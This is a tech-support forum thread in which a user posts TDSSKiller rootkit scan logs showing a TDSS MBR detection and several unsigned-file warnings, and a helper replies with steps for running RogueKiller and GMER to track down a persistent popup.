00:53:51.0456 4376	SharedAccess - ok
00:53:51.0518 4376	ShellHWDetection (c7230fbee14437716701c15be02c27b8) C:\Windows\System32\shsvcs.dll
00:53:51.0534 4376	ShellHWDetection - ok
00:53:51.0581 4376	SI3132 (7d494c2000287595d87b9ff6b080d3ff) C:\Windows\system32\DRIVERS\SI3132.sys
00:53:51.0596 4376	SI3132 - ok
00:53:51.0643 4376	SiFilter (df978385397187ba5e5e1c9c56a80a1a) C:\Windows\system32\DRIVERS\SiWinAcc.sys
00:53:51.0659 4376	SiFilter - ok
00:53:51.0705 4376	simptcp (a275fbb7c99458c12e088dff3e58eb4d) C:\Windows\System32\tcpsvcs.exe
00:53:51.0783 4376	simptcp - ok
00:53:51.0799 4376	SiRemFil (aaab072321d75a366269a6d089f3d71e) C:\Windows\system32\DRIVERS\SiRemFil.sys
00:53:51.0815 4376	SiRemFil - ok
00:53:51.0846 4376	sisagp (d2a595d6eebeeaf4334f8e50efbc9931) C:\Windows\system32\drivers\sisagp.sys
00:53:51.0861 4376	sisagp - ok
00:53:51.0893 4376	SiSRaid2 (cedd6f4e7d84e9f98b34b3fe988373aa) C:\Windows\system32\drivers\sisraid2.sys
00:53:51.0908 4376	SiSRaid2 - ok
00:53:51.0955 4376	SiSRaid4 (df843c528c4f69d12ce41ce462e973a7) C:\Windows\system32\drivers\sisraid4.sys
00:53:51.0971 4376	SiSRaid4 - ok
00:53:52.0688 4376	slsvc (862bb4cbc05d80c5b45be430e5ef872f) C:\Windows\system32\SLsvc.exe
00:53:52.0985 4376	slsvc - ok
00:53:53.0515 4376	SLUINotify (6edc422215cd78aa8a9cde6b30abbd35) C:\Windows\system32\SLUINotify.dll
00:53:53.0546 4376	SLUINotify - ok
00:53:53.0765 4376	Smb (7b75299a4d201d6a6533603d6914ab04) C:\Windows\system32\DRIVERS\smb.sys
00:53:53.0796 4376	Smb - ok
00:53:53.0905 4376	SNMPTRAP (2a146a055b4401c16ee62d18b8e2a032) C:\Windows\System32\snmptrap.exe
00:53:53.0921 4376	SNMPTRAP - ok
00:53:54.0061 4376	spldr (7aebdeef071fe28b0eef2cdd69102bff) C:\Windows\system32\drivers\spldr.sys
00:53:54.0077 4376	spldr - ok
00:53:54.0217 4376	Spooler (8554097e5136c3bf9f69fe578a1b35f4) C:\Windows\System32\spoolsv.exe
00:53:54.0233 4376	Spooler - ok
00:53:54.0467 4376	sptd (7f1b7c4d446cd3f926af45b8c48bd593) C:\Windows\system32\Drivers\sptd.sys
00:53:54.0467 4376	Suspicious file (NoAccess): C:\Windows\system32\Drivers\sptd.sys. md5: 7f1b7c4d446cd3f926af45b8c48bd593
00:53:54.0467 4376	sptd ( LockedFile.Multi.Generic ) - warning
00:53:54.0467 4376	sptd - detected LockedFile.Multi.Generic (1)
00:53:54.0591 4376	srv (41987f9fc0e61adf54f581e15029ad91) C:\Windows\system32\DRIVERS\srv.sys
00:53:54.0638 4376	srv - ok
00:53:54.0701 4376	srv2 (ff33aff99564b1aa534f58868cbe41ef) C:\Windows\system32\DRIVERS\srv2.sys
00:53:54.0747 4376	srv2 - ok
00:53:54.0779 4376	srvnet (7605c0e1d01a08f3ecd743f38b834a44) C:\Windows\system32\DRIVERS\srvnet.sys
00:53:54.0794 4376	srvnet - ok
00:53:54.0919 4376	SSDPSRV (03d50b37234967433a5ea5ba72bc0b62) C:\Windows\System32\ssdpsrv.dll
00:53:54.0966 4376	SSDPSRV - ok
00:53:55.0106 4376	SstpSvc (6f1a32e7b7b30f004d9a20afadb14944) C:\Windows\system32\sstpsvc.dll
00:53:55.0153 4376	SstpSvc - ok
00:53:55.0403 4376	StarWindServiceAE (b1691af4a072cb674d600db16dd7308e) C:\Program Files\Alcohol Soft\Alcohol 52\StarWind\StarWindServiceAE.exe
00:53:55.0418 4376	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - warning
00:53:55.0418 4376	StarWindServiceAE - detected UnsignedFile.Multi.Generic (1)
00:53:55.0496 4376	StillCam (ef70b3d22b4bffda6ea851ecb063efaa) C:\Windows\system32\DRIVERS\serscan.sys
00:53:55.0527 4376	StillCam - ok
00:53:55.0652 4376	stisvc (5de7d67e49b88f5f07f3e53c4b92a352) C:\Windows\System32\wiaservc.dll
00:53:55.0715 4376	stisvc - ok
00:53:55.0839 4376	swenum (7ba58ecf0c0a9a69d44b3dca62becf56) C:\Windows\system32\DRIVERS\swenum.sys
00:53:55.0855 4376	swenum - ok
00:53:56.0011 4376	swprv (f21fd248040681cca1fb6c9a03aaa93d) C:\Windows\System32\swprv.dll
00:53:56.0042 4376	swprv - ok
00:53:56.0183 4376	Swupdtmr (327786c5d6bcf284fab14c2b5751f514) c:\Toshiba\IVP\swupdate\swupdtmr.exe
00:53:56.0853 4376	Swupdtmr - ok
00:53:56.0963 4376	Symc8xx (192aa3ac01df071b541094f251deed10) C:\Windows\system32\drivers\symc8xx.sys
00:53:56.0978 4376	Symc8xx - ok
00:53:56.0994 4376	Sym_hi (8c8eb8c76736ebaf3b13b633b2e64125) C:\Windows\system32\drivers\sym_hi.sys
00:53:57.0009 4376	Sym_hi - ok
00:53:57.0025 4376	Sym_u3 (8072af52b5fd103bbba387a1e49f62cb) C:\Windows\system32\drivers\sym_u3.sys
00:53:57.0041 4376	Sym_u3 - ok
00:53:57.0087 4376	SynTP (5efcedcf3daf5c8d9e8b77a34a4eec99) C:\Windows\system32\DRIVERS\SynTP.sys
00:53:57.0103 4376	SynTP - ok
00:53:57.0290 4376	SysMain (9a51b04e9886aa4ee90093586b0ba88d) C:\Windows\system32\sysmain.dll
00:53:57.0337 4376	SysMain - ok
00:53:57.0415 4376	TabletInputService (2dca225eae15f42c0933e998ee0231c3) C:\Windows\System32\TabSvc.dll
00:53:57.0431 4376	TabletInputService - ok
00:53:57.0555 4376	TapiSrv (d7673e4b38ce21ee54c59eeeb65e2483) C:\Windows\System32\tapisrv.dll
00:53:57.0587 4376	TapiSrv - ok
00:53:57.0665 4376	TBS (cb05822cd9cc6c688168e113c603dbe7) C:\Windows\System32\tbssvc.dll
00:53:57.0696 4376	TBS - ok
00:53:57.0961 4376	Tcpip (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\drivers\tcpip.sys
00:53:58.0039 4376	Tcpip - ok
00:53:58.0055 4376	Tcpip6 (ee7e10bed85c312c1d5d30c435bdda9f) C:\Windows\system32\DRIVERS\tcpip.sys
00:53:58.0133 4376	Tcpip6 - ok
00:53:58.0242 4376	tcpipreg (2c2d4cff5e09c73908f9b5af49a51365) C:\Windows\system32\drivers\tcpipreg.sys
00:53:58.0304 4376	tcpipreg - ok
00:53:58.0351 4376	tdcmdpst (1825bceb47bf41c5a9f0e44de82fc27a) C:\Windows\system32\DRIVERS\tdcmdpst.sys
00:53:58.0382 4376	tdcmdpst - ok
00:53:58.0413 4376	TDPIPE (5dcf5e267be67a1ae926f2df77fbcc56) C:\Windows\system32\drivers\tdpipe.sys
00:53:58.0460 4376	TDPIPE - ok
00:53:58.0523 4376	TDTCP (389c63e32b3cefed425b61ed92d3f021) C:\Windows\system32\drivers\tdtcp.sys
00:53:58.0554 4376	TDTCP - ok
00:53:58.0679 4376	tdx (76b06eb8a01fc8624d699e7045303e54) C:\Windows\system32\DRIVERS\tdx.sys
00:53:58.0710 4376	tdx - ok
00:53:59.0381 4376	TeamViewer6 (fe559178000347d2ca1b7847f0379749) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
00:53:59.0568 4376	TeamViewer6 - ok
00:54:00.0192 4376	TermDD (3cad38910468eab9a6479e2f01db43c7) C:\Windows\system32\DRIVERS\termdd.sys
00:54:00.0207 4376	TermDD - ok
00:54:00.0379 4376	TermService (bb95da09bef6e7a131bff3ba5032090d) C:\Windows\System32\termsrv.dll
00:54:00.0426 4376	TermService - ok
00:54:00.0597 4376	Themes (c7230fbee14437716701c15be02c27b8) C:\Windows\system32\shsvcs.dll
00:54:00.0613 4376	Themes - ok
00:54:00.0707 4376	THREADORDER (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
00:54:00.0753 4376	THREADORDER - ok
00:54:00.0816 4376	tifm21 (28b7f973c36d157a7885b1ae42a4a2a9) C:\Windows\system32\drivers\tifm21.sys
00:54:00.0894 4376	tifm21 - ok
00:54:01.0050 4376	TNaviSrv (38e18dce385ff2ded57423a279559dbc) C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
00:54:01.0268 4376	TNaviSrv ( UnsignedFile.Multi.Generic ) - warning
00:54:01.0268 4376	TNaviSrv - detected UnsignedFile.Multi.Generic (1)
00:54:01.0346 4376	TODDSrv (d540858e65bfa6fded41ad2495ece344) C:\Windows\system32\TODDSrv.exe
00:54:01.0549 4376	TODDSrv ( UnsignedFile.Multi.Generic ) - warning
00:54:01.0549 4376	TODDSrv - detected UnsignedFile.Multi.Generic (1)
00:54:01.0674 4376	TosCoSrv (6a54c28b53c6b50d333c8ee974c6b208) C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
00:54:01.0752 4376	TosCoSrv - ok
00:54:01.0752 4376	Tosrfcom - ok
00:54:01.0830 4376	tos_sps32 (1ea5f27c29405bf49799feca77186da9) C:\Windows\system32\DRIVERS\tos_sps32.sys
00:54:01.0861 4376	tos_sps32 - ok
00:54:01.0877 4376	TpChoice - ok
00:54:02.0001 4376	TrkWks (ec74e77d0eb004bd3a809b5f8fb8c2ce) C:\Windows\System32\trkwks.dll
00:54:02.0033 4376	TrkWks - ok
00:54:02.0189 4376	TrustedInstaller (97d9d6a04e3ad9b6c626b9931db78dba) C:\Windows\servicing\TrustedInstaller.exe
00:54:02.0204 4376	TrustedInstaller - ok
00:54:02.0298 4376	tssecsrv (dcf0f056a2e4f52287264f5ab29cf206) C:\Windows\system32\DRIVERS\tssecsrv.sys
00:54:02.0329 4376	tssecsrv - ok
00:54:02.0376 4376	tunmp (caecc0120ac49e3d2f758b9169872d38) C:\Windows\system32\DRIVERS\tunmp.sys
00:54:02.0423 4376	tunmp - ok
00:54:02.0469 4376	tunnel (300db877ac094feab0be7688c3454a9c) C:\Windows\system32\DRIVERS\tunnel.sys
00:54:02.0485 4376	tunnel - ok
00:54:02.0532 4376	TVALZ (792a8b80f8188aba4b2be271583f3e46) C:\Windows\system32\DRIVERS\TVALZ_O.SYS
00:54:02.0547 4376	TVALZ - ok
00:54:02.0625 4376	uagp35 (c3ade15414120033a36c0f293d4a4121) C:\Windows\system32\drivers\uagp35.sys
00:54:02.0641 4376	uagp35 - ok
00:54:02.0719 4376	udfs (d9728af68c4c7693cb100b8441cbdec6) C:\Windows\system32\DRIVERS\udfs.sys
00:54:02.0750 4376	udfs - ok
00:54:02.0828 4376	UI0Detect (ecef404f62863755951e09c802c94ad5) C:\Windows\system32\UI0Detect.exe
00:54:02.0875 4376	UI0Detect - ok
00:54:02.0984 4376	UleadBurningHelper (332d341d92b933600d41953b08360dfb) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
00:54:02.0984 4376	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - warning
00:54:02.0984 4376	UleadBurningHelper - detected UnsignedFile.Multi.Generic (1)
00:54:03.0109 4376	uliagpkx (75e6890ebfce0841d3291b02e7a8bdb0) C:\Windows\system32\drivers\uliagpkx.sys
00:54:03.0125 4376	uliagpkx - ok
00:54:03.0156 4376	uliahci (3cd4ea35a6221b85dcc25daa46313f8d) C:\Windows\system32\drivers\uliahci.sys
00:54:03.0171 4376	uliahci - ok
00:54:03.0359 4376	UlSata (8514d0e5cd0534467c5fc61be94a569f) C:\Windows\system32\drivers\ulsata.sys
00:54:03.0374 4376	UlSata - ok
00:54:03.0483 4376	ulsata2 (38c3c6e62b157a6bc46594fada45c62b) C:\Windows\system32\drivers\ulsata2.sys
00:54:03.0499 4376	ulsata2 - ok
00:54:03.0608 4376	umbus (32cff9f809ae9aed85464492bf3e32d2) C:\Windows\system32\DRIVERS\umbus.sys
00:54:03.0639 4376	umbus - ok
00:54:03.0780 4376	upnphost (68308183f4ae0be7bf8ecd07cb297999) C:\Windows\System32\upnphost.dll
00:54:03.0827 4376	upnphost - ok
00:54:03.0936 4376	USBAAPL (83cafcb53201bbac04d822f32438e244) C:\Windows\system32\Drivers\usbaapl.sys
00:54:03.0983 4376	USBAAPL ( UnsignedFile.Multi.Generic ) - warning
00:54:03.0983 4376	USBAAPL - detected UnsignedFile.Multi.Generic (1)
00:54:04.0076 4376	usbaudio (32db9517628ff0d070682aab61e688f0) C:\Windows\system32\drivers\usbaudio.sys
00:54:04.0107 4376	usbaudio - ok
00:54:04.0248 4376	usbccgp (caf811ae4c147ffcd5b51750c7f09142) C:\Windows\system32\DRIVERS\usbccgp.sys
00:54:04.0279 4376	usbccgp - ok
00:54:04.0326 4376	usbcir (e9476e6c486e76bc4898074768fb7131) C:\Windows\system32\drivers\usbcir.sys
00:54:04.0388 4376	usbcir - ok
00:54:04.0451 4376	usbehci (79e96c23a97ce7b8f14d310da2db0c9b) C:\Windows\system32\DRIVERS\usbehci.sys
00:54:04.0466 4376	usbehci - ok
00:54:04.0497 4376	usbhub (4673bbcb006af60e7abddbe7a130ba42) C:\Windows\system32\DRIVERS\usbhub.sys
00:54:04.0529 4376	usbhub - ok
00:54:04.0607 4376	usbohci (ce697fee0d479290d89bec80dfe793b7) C:\Windows\system32\DRIVERS\usbohci.sys
00:54:04.0622 4376	usbohci - ok
00:54:04.0716 4376	usbprint (e75c4b5269091d15a2e7dc0b6d35f2f5) C:\Windows\system32\DRIVERS\usbprint.sys
00:54:04.0747 4376	usbprint - ok
00:54:04.0809 4376	usbscan (a508c9bd8724980512136b039bba65e9) C:\Windows\system32\DRIVERS\usbscan.sys
00:54:04.0825 4376	usbscan - ok
00:54:04.0934 4376	USBSTOR (be3da31c191bc222d9ad503c5224f2ad) C:\Windows\system32\DRIVERS\USBSTOR.SYS
00:54:04.0981 4376	USBSTOR - ok
00:54:05.0012 4376	usbuhci (325dbbacb8a36af9988ccf40eac228cc) C:\Windows\system32\DRIVERS\usbuhci.sys
00:54:05.0059 4376	usbuhci - ok
00:54:05.0745 4376	usbvideo (0a6b81f01bc86399482e27e6fda7b33b) C:\Windows\system32\Drivers\usbvideo.sys
00:54:05.0808 4376	usbvideo - ok
00:54:05.0886 4376	UVCFTR (5701a984efa8e209848a6d556dd02933) C:\Windows\system32\DRIVERS\UVCFTR_S.SYS
00:54:05.0901 4376	UVCFTR - ok
00:54:06.0026 4376	UxSms (1509e705f3ac1d474c92454a5c2dd81f) C:\Windows\System32\uxsms.dll
00:54:06.0042 4376	UxSms - ok
00:54:06.0198 4376	vds (cd88d1b7776dc17a119049742ec07eb4) C:\Windows\System32\vds.exe
00:54:06.0276 4376	vds - ok
00:54:06.0354 4376	vga (7d92be0028ecdedec74617009084b5ef) C:\Windows\system32\DRIVERS\vgapnp.sys
00:54:06.0401 4376	vga - ok
00:54:06.0447 4376	VgaSave (2e93ac0a1d8c79d019db6c51f036636c) C:\Windows\System32\drivers\vga.sys
00:54:06.0494 4376	VgaSave - ok
00:54:06.0525 4376	viaagp (045d9961e591cf0674a920b6ba3ba5cb) C:\Windows\system32\drivers\viaagp.sys
00:54:06.0541 4376	viaagp - ok
00:54:06.0557 4376	ViaC7 (56a4de5f02f2e88182b0981119b4dd98) C:\Windows\system32\drivers\viac7.sys
00:54:06.0619 4376	ViaC7 - ok
00:54:06.0635 4376	viaide (fd2e3175fcada350c7ab4521dca187ec) C:\Windows\system32\drivers\viaide.sys
00:54:06.0650 4376	viaide - ok
00:54:06.0744 4376	volmgr (69503668ac66c77c6cd7af86fbdf8c43) C:\Windows\system32\drivers\volmgr.sys
00:54:06.0759 4376	volmgr - ok
00:54:06.0900 4376	volmgrx (23e41b834759917bfd6b9a0d625d0c28) C:\Windows\system32\drivers\volmgrx.sys
00:54:06.0915 4376	volmgrx - ok
00:54:07.0009 4376	volsnap (147281c01fcb1df9252de2a10d5e7093) C:\Windows\system32\drivers\volsnap.sys
00:54:07.0025 4376	volsnap - ok
00:54:07.0118 4376	vsmraid (d984439746d42b30fc65a4c3546c6829) C:\Windows\system32\drivers\vsmraid.sys
00:54:07.0149 4376	vsmraid - ok
00:54:07.0368 4376	VSS (db3d19f850c6eb32bdcb9bc0836acddb) C:\Windows\system32\vssvc.exe
00:54:07.0430 4376	VSS - ok
00:54:07.0555 4376	W32Time (96ea68b9eb310a69c25ebb0282b2b9de) C:\Windows\system32\w32time.dll
00:54:07.0586 4376	W32Time - ok
00:54:07.0742 4376	W3SVC (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
00:54:07.0789 4376	W3SVC - ok
00:54:07.0945 4376	WacomPen (48dfee8f1af7c8235d4e626f0c4fe031) C:\Windows\system32\drivers\wacompen.sys
00:54:07.0992 4376	WacomPen - ok
00:54:08.0039 4376	Wanarp (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
00:54:08.0070 4376	Wanarp - ok
00:54:08.0070 4376	Wanarpv6 (55201897378cca7af8b5efd874374a26) C:\Windows\system32\DRIVERS\wanarp.sys
00:54:08.0101 4376	Wanarpv6 - ok
00:54:08.0101 4376	WAS (9ca92191c8f18e8b491a5b28e63c07b7) C:\Windows\system32\inetsrv\iisw3adm.dll
00:54:08.0132 4376	WAS - ok
00:54:08.0226 4376	wcncsvc (a3cd60fd826381b49f03832590e069af) C:\Windows\System32\wcncsvc.dll
00:54:08.0257 4376	wcncsvc - ok
00:54:08.0288 4376	WcsPlugInService (11bcb7afcdd7aadacb5746f544d3a9c7) C:\Windows\System32\WcsPlugInService.dll
00:54:08.0319 4376	WcsPlugInService - ok
00:54:08.0382 4376	Wd (afc5ad65b991c1e205cf25cfdbf7a6f4) C:\Windows\system32\drivers\wd.sys
00:54:08.0397 4376	Wd - ok
00:54:08.0553 4376	Wdf01000 (b6f0a7ad6d4bd325fbcd8bac96cd8d96) C:\Windows\system32\drivers\Wdf01000.sys
00:54:08.0585 4376	Wdf01000 - ok
00:54:08.0709 4376	WdiServiceHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
00:54:08.0741 4376	WdiServiceHost - ok
00:54:08.0741 4376	WdiSystemHost (abfc76b48bb6c96e3338d8943c5d93b5) C:\Windows\system32\wdi.dll
00:54:08.0787 4376	WdiSystemHost - ok
00:54:08.0850 4376	WebClient (04c37d8107320312fbae09926103d5e2) C:\Windows\System32\webclnt.dll
00:54:08.0865 4376	WebClient - ok
00:54:08.0912 4376	Wecsvc (ae3736e7e8892241c23e4ebbb7453b60) C:\Windows\system32\wecsvc.dll
00:54:08.0943 4376	Wecsvc - ok
00:54:09.0131 4376	wercplsupport (670ff720071ed741206d69bd995ea453) C:\Windows\System32\wercplsupport.dll
00:54:09.0162 4376	wercplsupport - ok
00:54:09.0255 4376	WerSvc (32b88481d3b326da6deb07b1d03481e7) C:\Windows\System32\WerSvc.dll
00:54:09.0318 4376	WerSvc - ok
00:54:09.0583 4376	WinDefend (4575aa12561c5648483403541d0d7f2b) C:\Program Files\Windows Defender\mpsvc.dll
00:54:09.0614 4376	WinDefend - ok
00:54:09.0614 4376	WinHttpAutoProxySvc - ok
00:54:09.0755 4376	Winmgmt (6b2a1d0e80110e3d04e6863c6e62fd8a) C:\Windows\system32\wbem\WMIsvc.dll
00:54:09.0786 4376	Winmgmt - ok
00:54:09.0942 4376	WinRM (7cfe68bdc065e55aa5e8421607037511) C:\Windows\system32\WsmSvc.dll
00:54:10.0035 4376	WinRM - ok
00:54:10.0207 4376	Wlansvc (c008405e4feeb069e30da1d823910234) C:\Windows\System32\wlansvc.dll
00:54:10.0301 4376	Wlansvc - ok
00:54:10.0691 4376	wlidsvc (0a70f4022ec2e14c159efc4f69aa2477) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
00:54:10.0987 4376	wlidsvc - ok
00:54:11.0502 4376	WmiAcpi (701a9f884a294327e9141d73746ee279) C:\Windows\system32\drivers\wmiacpi.sys
00:54:11.0549 4376	WmiAcpi - ok
00:54:11.0705 4376	wmiApSrv (43be3875207dcb62a85c8c49970b66cc) C:\Windows\system32\wbem\WmiApSrv.exe
00:54:11.0736 4376	wmiApSrv - ok
00:54:12.0001 4376	WMPNetworkSvc (3978704576a121a9204f8cc49a301a9b) C:\Program Files\Windows Media Player\wmpnetwk.exe
00:54:12.0095 4376	WMPNetworkSvc - ok
00:54:12.0173 4376	WPCSvc (cfc5a04558f5070cee3e3a7809f3ff52) C:\Windows\System32\wpcsvc.dll
00:54:12.0204 4376	WPCSvc - ok
00:54:12.0266 4376	WPDBusEnum (801fbdb89d472b3c467eb112a0fc9246) C:\Windows\system32\wpdbusenum.dll
00:54:12.0313 4376	WPDBusEnum - ok
00:54:12.0407 4376	WpdUsb (de9d36f91a4df3d911626643debf11ea) C:\Windows\system32\DRIVERS\wpdusb.sys
00:54:12.0438 4376	WpdUsb - ok
00:54:12.0750 4376	WPFFontCache_v0400 (dcf3e3edf5109ee8bc02fe6e1f045795) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe
00:54:12.0921 4376	WPFFontCache_v0400 - ok
00:54:13.0015 4376	ws2ifsl (e3a3cb253c0ec2494d4a61f5e43a389c) C:\Windows\system32\drivers\ws2ifsl.sys
00:54:13.0046 4376	ws2ifsl - ok
00:54:13.0171 4376	wscsvc (1ca6c40261ddc0425987980d0cd2aaab) C:\Windows\system32\wscsvc.dll
00:54:13.0187 4376	wscsvc - ok
00:54:13.0265 4376	WSDPrintDevice (4422ac5ed8d4c2f0db63e71d4c069dd7) C:\Windows\system32\DRIVERS\WSDPrint.sys
00:54:13.0280 4376	WSDPrintDevice - ok
00:54:13.0280 4376	WSearch - ok
00:54:13.0623 4376	wuauserv (6298277b73c77fa99106b271a7525163) C:\Windows\system32\wuaueng.dll
00:54:13.0779 4376	wuauserv - ok
00:54:14.0216 4376	WUDFRd (ac13cb789d93412106b0fb6c7eb2bcb6) C:\Windows\system32\DRIVERS\WUDFRd.sys
00:54:14.0263 4376	WUDFRd - ok
00:54:14.0357 4376	wudfsvc (575a4190d989f64732119e4114045a4f) C:\Windows\System32\WUDFSvc.dll
00:54:14.0403 4376	wudfsvc - ok
00:54:14.0528 4376	xnacc (9eea6d029fef5f3016d089b1a603837d) C:\Windows\system32\DRIVERS\xnacc.sys
00:54:14.0575 4376	xnacc - ok
00:54:14.0622 4376	MBR (0x1B8) (5b5e648d12fcadc244c1ec30318e1eb9) \Device\Harddisk0\DR0
00:54:15.0277 4376	\Device\Harddisk0\DR0 ( TDSS File System ) - warning
00:54:15.0277 4376	\Device\Harddisk0\DR0 - detected TDSS File System (1)
00:54:15.0324 4376	Boot (0x1200) (4c665477e7a79fdb1f3f319443854ef8) \Device\Harddisk0\DR0\Partition0
00:54:15.0324 4376	\Device\Harddisk0\DR0\Partition0 - ok
00:54:15.0324 4376	============================================================
00:54:15.0324 4376	Scan finished
00:54:15.0324 4376	============================================================
00:54:15.0339 2928	Detected object count: 14
00:54:15.0339 2928	Actual detected object count: 14
00:56:11.0364 2928	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0365 2928	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0368 2928	IDriverT ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0369 2928	IDriverT ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0371 2928	KR10I ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0371 2928	KR10I ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0374 2928	KR10N ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0374 2928	KR10N ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0377 2928	KR3NPXP ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0377 2928	KR3NPXP ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	NCHSSVAD ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	NCHSSVAD ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	ServiceLayer ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	ServiceLayer ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	sptd ( LockedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	sptd ( LockedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	StarWindServiceAE ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0408 2928	TNaviSrv ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0408 2928	TNaviSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	TODDSrv ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0423 2928	TODDSrv ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0423 2928	UleadBurningHelper ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	USBAAPL ( UnsignedFile.Multi.Generic ) - skipped by user
00:56:11.0423 2928	USBAAPL ( UnsignedFile.Multi.Generic ) - User select action: Skip 
00:56:11.0423 2928	\Device\Harddisk0\DR0 ( TDSS File System ) - skipped by user
00:56:11.0423 2928	\Device\Harddisk0\DR0 ( TDSS File System ) - User select action: Skip 
00:56:43.0173 3104	Deinitialize success


----------



## gagraptor (May 23, 2012)

00:51:38.0656 4056	TDSS rootkit removing tool 2.7.36.0 May 21 2012 16:40:16
00:51:38.0941 4056	============================================================
00:51:38.0941 4056	Current date / time: 2012/06/01 00:51:38.0941
00:51:38.0941 4056	SystemInfo:
00:51:38.0941 4056	
00:51:38.0941 4056	OS Version: 6.0.6002 ServicePack: 2.0
00:51:38.0941 4056	Product type: Workstation
00:51:38.0941 4056	ComputerName: GAGAN-PC
00:51:38.0941 4056	UserName: GAGAN
00:51:38.0941 4056	Windows directory: C:\Windows
00:51:38.0941 4056	System windows directory: C:\Windows
00:51:38.0941 4056	Processor architecture: Intel x86
00:51:38.0941 4056	Number of processors: 2
00:51:38.0941 4056	Page size: 0x1000
00:51:38.0941 4056	Boot type: Normal boot
00:51:38.0941 4056	============================================================
00:51:49.0300 4056	Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
00:51:49.0303 4056	============================================================
00:51:49.0304 4056	\Device\Harddisk0\DR0:
00:51:49.0304 4056	MBR partitions:
00:51:49.0304 4056	\Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x1CED7000
00:51:49.0304 4056	============================================================
00:51:49.0355 4056	C: <-> \Device\Harddisk0\DR0\Partition0
00:51:49.0356 4056	============================================================
00:51:49.0356 4056	Initialize success
00:51:49.0356 4056	============================================================
00:52:18.0831 2772	Deinitialize success

i found 2 logs i just posted both


----------



## Mark1956 (May 7, 2011)

Thanks for the logs, you're doing fine, the infection is proving tricky to find but we will get there.

Are you aware of any previous TDL4 infection that was removed?

Please start your browser with no add-ons and tell me if the pop up still appears. How to run Firefox and Internet Explorer with no add-ons

Please also confirm if the pop up appears with any specific browser or is it with both of them?

If disabling add-ons still fails to stop the popup then continue with these instructions.

*STEP 1*
Download RogueKiller (by tigzy) and save direct to your Desktop.
On the web page click on this:









Quit all programs 
Start RogueKiller.exe 
Wait until Prescan has finished ... 
Ensure all boxes are ticked under "Report" tab. 
Click on Scan. 
Click on Report when complete.Copy/paste the content of the report and paste to next reply.... 










*STEP 2*
Please download *GMER* from one of the following locations and save it to your desktop:

Main Mirror <-_This version will download a randomly named .exe file (Recommended)_
Zipped Mirror <-_This version will download a zip file you will need to extract first._

Disconnect from the Internet and *temporarily disable* your anti-virus, Firewall and any anti-malware real-time protection _*before*_ performing a scan so they will not conflict with gmer's driver.
Click  *this link* to see a list of such programs and how to disable them..
Double-click on the *randomly named* GMER file (i.e. n7gmo46c.exe) and allow the gmer.sys driver to load if asked.
_Note: If you downloaded the zipped version, extract the file to its own folder such as C:\gmer and then double-click on gmer.exe._








GMER will open to the Rootkit/Malware tab and perform an automatic quick scan when first run. _(do not use the computer while the scan is in progress)_
If you receive a WARNING!!! about rootkit activity and are asked to fully scan your system...click *NO*.
On the right side panel, several boxes have been checked. Please *UNCHECK the following:*
*IAT/EAT*
*Drives*/Partition other than Systemdrive (typically C:\) 
*Show All* *<- don't miss this one*
[/url]
Now click the *Scan* button. If you see a rootkit warning window, click OK.
When the scan is finished, click the *Save...* button to save the scan results to your Desktop. Save the file as *gmer.log*.
Click the *Copy* button and paste the results into your next reply.
Exit GMER and be sure to *re-enable* your anti-virus, Firewall and any other security programs you had disabled.
-- If GMER crashes or keeps resulting in a BSODs, deselect (uncheck) *Devices*, *Sections*, and *Files* along with the other items mentioned.
-- If you still encounter problems, try running GMER in safe mode.


----------



## gagraptor (May 23, 2012)

I'm sorry i was not very clear about the popup. It starts as soon i turn on the computer and is above all windows even if i've not opened any browser, If i'm not connected to the internet it still pops up but does not become the active window.


----------



## gagraptor (May 23, 2012)

RogueKiller V7.5.2 [05/30/2012] by Tigzy
mail: tigzyRK<at>gmail<dot>com
Feedback: http://www.geekstogo.com/forum/files/file/413-roguekiller/
